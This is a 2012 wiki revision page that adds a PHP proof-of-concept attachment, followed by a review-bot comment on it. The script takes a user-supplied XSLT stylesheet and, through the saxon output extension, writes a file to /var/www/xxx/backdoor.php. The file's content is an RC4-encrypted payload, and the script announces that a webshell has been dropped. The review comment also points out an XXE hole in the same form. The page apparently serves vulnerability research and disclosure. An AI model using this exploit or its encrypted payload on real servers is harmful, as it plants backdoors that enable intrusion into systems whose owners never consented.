Changes for page Application_PHP5

Last modified by Nicolas Gregoire on 2012/02/02 17:29

From version 15.1
edited by Nicolas Gregoire
on 2012/01/16 11:37
Change comment: There is no comment for this version
To version 16.1
edited by Nicolas Gregoire
on 2012/01/16 11:38
Change comment: Upload new attachment php539-xslt.php


Details

php539-xslt.php
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +2.0 KB
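--- a/php539-xslt.php
+++ b/php539-xslt.php
@@ -1,0 +1,68 @@
+
+<?php
+
+// Get parameters
+$action = $_POST['action'];
+$xml = $_POST['xml'];
+$xsl = $_POST['xsl'];
+
+print "<html><body>";
+if ($action == "transform") {
+
+ print "<h2>Ready to transform ...</h2><br/>";
+
+ # LOAD XML FILE
+ $xmldom = new DOMDocument();
+ print "XML: <pre>".htmlentities($xml)."</pre><br/>";
+ $xmldom->loadXML($xml);
+
+ # LOAD XSLT FILE
+ $xsldom = new DOMDocument();
+ print "XSL: <pre>".htmlentities($xsl)."</pre><br/>";
+ $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted !
+
+ # START XSLT
+ $xslproc = new XSLTProcessor();
+ $xslproc->importStylesheet($xsldom);
+
+ # TRANSFORM & PRINT
+ $output = $xslproc->transformToXML($xmldom); // File creation !
+ print "Output: <pre>".htmlentities($output)."</pre><br/>";
+
+} else {
+
+ # DISPLAY A PRE-FILLED FORM
+ print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>";
+ print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>";
+ print "<form method='post'>";
+ print "XML document:<br/>";
+ print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>";
+ print "XSLT code:<br/>";
+ print "<textarea name='xsl' rows='20' cols='130'>";
+print <<<XSLT
+<xsl:stylesheet
+ version="1.0"
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+ xmlns:cry="http://exslt.org/crypto"
+ xmlns:sax="http://icl.com/saxon"
+ extension-element-prefixes="cry sax">
+
+ <xsl:template match="/">
+ <sax:output href="/var/www/xxx/backdoor.php" method="text">
+ <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/>
+ </sax:output>
+ <xsl:text>A webshell have been dropped</xsl:text>
+ </xsl:template>
+
+</xsl:stylesheet>
+XSLT;
+ print "</textarea><br/><br/>";
+ print "<input type='hidden' name='action' value='transform'/>";
+ print "<input type='submit'/></form>";
+
+}
+print "</body></html>";
+
+?>
+
+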
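Review bot: The stylesheet comes straight from `$_POST['xsl']` and is handed to `XSLTProcessor` with no security preferences set, which is what lets the `sax:output href="/var/www/xxx/backdoor.php"` element on line 51 write an arbitrary file — intentional for this PoC, but the page should state the precondition: it only works where the libxslt build allows file writes, and on PHP versions that expose `XSLTProcessor::setSecurityPrefs()` the default preferences are expected to block the write and turn the demo into a silent no-op (worth confirming against the 5.3.9 target the filename implies). Independently of XSLT, `$xmldom->loadXML($xml)` on line 17 parses the untrusted XML document with entity loading left at its default, so the same form is also an XXE vector; a one-line `libxml_disable_entity_loader(true);` before the `loadXML` calls would scope the demo to the XSLT issue alone. The comment on line 22 names `$xXsl` while the variable is `$xsl`; it should read `// Content of $xsl may be untrusted !`. Minor: lines 5–7 read `$_POST` keys that are absent on the first (GET) display of the form and emit undefined-index notices; on 5.3 the fix is `$action = isset($_POST['action']) ? $_POST['action'] : '';` and likewise for `$xml` and `$xsl`.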